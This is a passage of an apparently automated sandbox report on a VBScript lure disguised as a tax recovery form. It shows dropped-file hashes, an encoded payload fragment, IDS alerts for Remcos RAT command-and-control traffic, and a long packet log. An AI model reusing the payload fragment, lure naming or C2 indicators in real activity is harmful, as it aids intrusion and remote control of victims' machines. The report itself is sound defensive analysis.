                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                    Malicious:false
                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    File Type:ASCII text, with no line terminators
                    Category:dropped
                    Size (bytes):60
                    Entropy (8bit):4.038920595031593
                    Encrypted:false
                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                    Malicious:false
                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    File Type:ASCII text, with no line terminators
                    Category:dropped
                    Size (bytes):60
                    Entropy (8bit):4.038920595031593
                    Encrypted:false
                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                    Malicious:false
                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    File Type:ASCII text, with no line terminators
                    Category:dropped
                    Size (bytes):60
                    Entropy (8bit):4.038920595031593
                    Encrypted:false
                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                    Malicious:false
                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                    Process:C:\Windows\SysWOW64\msiexec.exe
                    File Type:Extensible storage user DataBase, version 0x620, checksum 0x61552b59, page size 32768, DirtyShutdown, Windows version 10.0
                    Category:dropped
                    Size (bytes):17301504
                    Entropy (8bit):1.026674492020102
                    Encrypted:false
                    SSDEEP:6144:jvQPYV7AyUO+xBGA611GJxBGA611Gv0M6JUX3XX35X3khTAzhTA/hTATX3t8nqkI:IyUD3F0TcT0TAitKxK/U5fC4Ago
                    MD5:CF526CB5022DF366B7CA33A38E81BF5B
                    SHA1:F75DE6AC9C4654F31234CE1D93EEB8827EC365C5
                    SHA-256:231A90EAB28B917E2D47F165EB4663416C767821F569C7B8688C8B7AB395DC06
                    SHA-512:39B43548C6ECC42FC524FAA369E5873E7E39D810A66952689697475AF197F85A328756D92DD793E52E11CED0BE2FFBCD9ECDF7A37E1673CBFA0A4D9D241BC647
                    Malicious:false
                    Preview:aU+Y... .......4.........gN;....{........................&....../...{..5....|..h.(.........................T.;....{..............................................................................................Y...........eJ......n........................................................................................................... ........+...{o..............................................................................................................................................................................................!...{..................................S.%.5....|..................2...5....|...........................#......h.(.....................................................................................................................................................................................................................................................................................................................................................
                    Process:C:\Windows\SysWOW64\msiexec.exe
                    File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                    Category:dropped
                    Size (bytes):2
                    Entropy (8bit):1.0
                    Encrypted:false
                    SSDEEP:3:Qn:Qn
                    MD5:F3B25701FE362EC84616A93A45CE9998
                    SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                    SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                    SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                    Malicious:false
                    Preview:..
                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    File Type:ASCII text, with very long lines (65536), with no line terminators
                    Category:dropped
                    Size (bytes):429904
                    Entropy (8bit):5.962563866149975
                    Encrypted:false
                    SSDEEP:6144:78s63sj4Y2J2oBxZuRm+NwUWBsiI+rW9bXBj+ajKTY8KwtoLDwRpcR3zMU:78dAj2v9sP+rWJB1K7KD4cAU
                    MD5:4E109C3F67BBAEEC861BE75B9E60E21A
                    SHA1:2774D952350A8CF4571E27151C096649B882429C
                    SHA-256:DD350ABEC9B70315777015EA9779421154C13FF21FD3CD8AF6A8B1DBDEA9A6E4
                    SHA-512:9C0AB199AFB82FDF89F7E509B0506C4E6C51787596B7FDAA22204684FC1DF62854FC8EB2C41D4D55F5B5A4B7E83D17648695788212C61084367A380BB5B06B43
                    Malicious:false
                    Preview:cQGb6wIY87slihIA6wJEZOsCHZwDXCQE6wLKdXEBm7kkM8Az6wJOl+sCXvmB8QnwP33rAgS/cQGbgektw/9OcQGb6wL4jnEBm+sCJp66ldZyKusCoJzrApCt6wJLuOsCowwxynEBm+sCG2CJFAvrAjew6wJA6NHicQGb6wKuyIPBBOsCeLZxAZuB+ZvYtgN8yXEBm3EBm4tEJATrAtrN6wKLTonD6wLYj3EBm4HD7DPIAXEBm3EBm7oxUdUvcQGb6wKNK4HyaDfsYHEBm3EBm4HqWWY5T3EBm3EBm+sC4YBxAZtxAZvrAkkNiwwQ6wKI+nEBm4kME+sCbuNxAZtC6wJBHesCx2qB+jR2BAB11OsCOHjrAlm5iVwkDHEBm+sCf3GB7QADAADrAtdNcQGbi1QkCOsCoVvrAgVdi3wkBOsCDnnrAk/jievrAq8g6wJNDoHDnAAAAOsCUk/rAm+eU+sCTm3rAs+NakBxAZtxAZuJ6+sCtOjrArgjx4MAAQAAAHDMA3EBm+sCAGiBwwABAADrAnwU6wKuBlPrAvKY6wLTronrcQGb6wIQy4m7BAEAAHEBm+sCCYeBwwQBAADrAt0JcQGbU+sCaw9xAZtq/+sCAn/rAiHrg8IF6wLu3usCAIwx9usCeGfrAiRYMcnrAqABcQGbixpxAZtxAZtBcQGbcQGbORwKdfRxAZvrAmNFRusCkVXrAlOngHwK+7h13XEBm3EBm4tECvzrAqDN6wLH9Cnw6wL5jesCoTz/0nEBm+sCgWm6NHYEAOsChbXrAj3KMcBxAZtxAZuLfCQM6wJ7gHEBm4E0Bz4CoZFxAZtxAZuDwATrAtB2cQGbOdB15esCsUpxAZuJ++sCEP3rAjx8/9dxAZtxAZvWAKGRPjtwyrvDxxT0i0QQ0i4UIDuDZb2Ms6TEt+cYp0PbdBDPjFUVnINQOA8rMxD/BekaJMXlnD4CHYDuOnIQeg+h3Gc1kfe72SD9MwJr4SYuINUz
                    File type:ASCII text, with very long lines (2077), with CRLF line terminators
                    Entropy (8bit):5.788591791109242
                    TrID:
                    • Visual Basic Script (13500/0) 100.00%
                    File name:Custom Export Tax Recovery Form.vbs
                    File size:35'856 bytes
                    MD5:36ffacaa0e821c2912bed0735361e00a
                    SHA1:c079a264f1b14321464ebe3d4d623768432f0b22
                    SHA256:35950af50b6f5b0a6d108fbac7d8e4dedc6b09b07b4a79c1daa77486254bd7c4
                    SHA512:511a33081e6077e315dd7daca04e4e686baac0a0b9bd1bf35055381ee61d3a3c27d358bfec43b65f03357815a8caa714cb188136ea55c40be0a22859b31132bc
                    SSDEEP:768:jxZSZs5rCwjhpJrC67PdLZgfWUdXp3PEQwubEm1VUN4nI1YufAhY:1ZSZspRjbJCSV/cBEObFJI15fIY
                    TLSH:73F238258EC501F9065706FBA84E2235D8BC15FB493100BDBC5CF6B94D1A3A8BE7E64B
                    File Content Preview:..Rem Pianist tumidly. milena?..Rem tagvinduet unpreferred forvandlende steepled! telefonlinien...Rem Nb kanonaden,..Rem Subtill stemmekb kapitalmngder; fodboldkarriere?..Rem Forjag78? indhylles? sidemanden? minipotmeter..If Benvne("PCE:\") = vbnullstring
                    Icon Hash:68d69b8f86ab9a86
                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                    2024-10-14T11:07:21.335659+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.649928154.216.18.652404TCP
                    2024-10-14T11:07:22.804496+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.649939154.216.18.652404TCP
                    2024-10-14T11:07:23.028037+02002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.649945178.237.33.5080TCP
                    TimestampSource PortDest PortSource IPDest IP
                    Oct 14, 2024 11:06:39.866158962 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:39.871248007 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:39.871320963 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:39.871543884 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:39.876488924 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.496243000 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.496305943 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.496360064 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.496437073 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.496448994 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.496460915 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.496471882 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.496483088 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.496485949 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.496495008 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.496507883 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.496519089 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.496536970 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.496558905 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.501159906 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.501190901 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.501241922 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.584640026 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.584666014 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.584677935 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.584698915 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.584717989 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.584732056 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.584770918 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.585027933 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.585040092 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.585051060 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.585069895 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.585078955 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.585084915 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.585112095 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.585131884 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.585912943 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.585926056 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.585937023 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.585969925 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.585982084 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.585994005 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.586019039 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.586782932 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.586826086 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.586838007 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.586848974 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.586859941 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.586905003 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.586909056 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.586951971 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.587626934 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.587713003 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.587755919 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.589662075 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.632536888 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.673362970 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.673391104 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.673413038 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.673427105 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.673446894 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.673460960 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.673472881 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.673525095 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.673540115 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.673767090 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.673778057 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.673791885 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.673820019 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.673857927 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.673871040 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.673886061 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.673933029 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.674464941 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.674581051 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.674596071 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.674607992 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.674622059 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.674632072 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.674639940 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.674645901 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.674669027 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.674712896 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.675235033 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.675285101 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.675317049 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.675329924 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.675374985 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.675379038 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.675412893 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.675425053 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.675436974 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.675457001 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.675499916 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.676132917 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.676146030 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.676157951 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.676191092 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.676196098 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.676204920 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.676218987 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.676230907 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.676235914 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.676263094 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.676954031 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.677000046 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.677006006 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.677015066 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.677059889 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.677067041 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.677072048 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.677084923 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.677097082 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.677120924 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.677138090 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.677891970 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.677905083 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.677916050 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.677928925 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.677952051 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.677970886 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.761812925 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.761842966 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.761890888 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.761913061 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.761990070 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.762001038 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.762012959 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.762041092 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.762046099 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.762058973 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.762089014 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.762098074 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.762099028 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.762115955 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.762152910 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.762165070 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.762176991 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.762187958 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.762200117 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.762216091 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.762248993 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.762384892 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.762444973 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.762455940 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.762480974 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.762489080 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.762492895 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.762506008 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.762520075 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.762526989 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.762528896 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.762552977 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.762588024 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.762944937 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.762957096 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.762969017 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.763005972 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.763031960 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.763045073 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.763056040 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.763067007 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.763075113 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.763103008 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.763170004 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.763181925 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.763192892 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.763204098 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.763215065 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.763222933 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.763226986 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.763259888 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.763281107 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.763895035 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.763931036 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.763942003 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.763942003 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.763956070 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.764007092 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.764023066 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.764034986 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.764045000 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.764061928 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.764076948 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.764086008 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.764087915 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.764098883 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.764102936 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.764117956 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.764143944 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.764736891 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.764750004 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.764760971 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.764790058 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.764800072 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.764801025 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.764811993 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.764823914 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.764831066 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.764834881 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.764846087 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.764858961 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.764889956 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.764897108 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.764909029 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.764919996 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.764931917 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.764954090 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.766885042 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.766896963 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.766910076 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.766938925 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.766961098 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.767003059 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.767014027 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.767024040 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.767034054 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.767045021 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.767060995 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.767070055 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.767074108 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.767087936 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.767097950 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.767106056 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.767110109 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.767123938 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.767143965 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.767347097 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.767364979 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.767416954 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.807543039 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.807559013 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.807571888 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.807611942 CEST4971280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:06:40.849837065 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.849859953 CEST8049712172.67.128.117192.168.2.6
                    Oct 14, 2024 11:06:40.849870920 CEST8049712172.67.128.117192.168.2.6
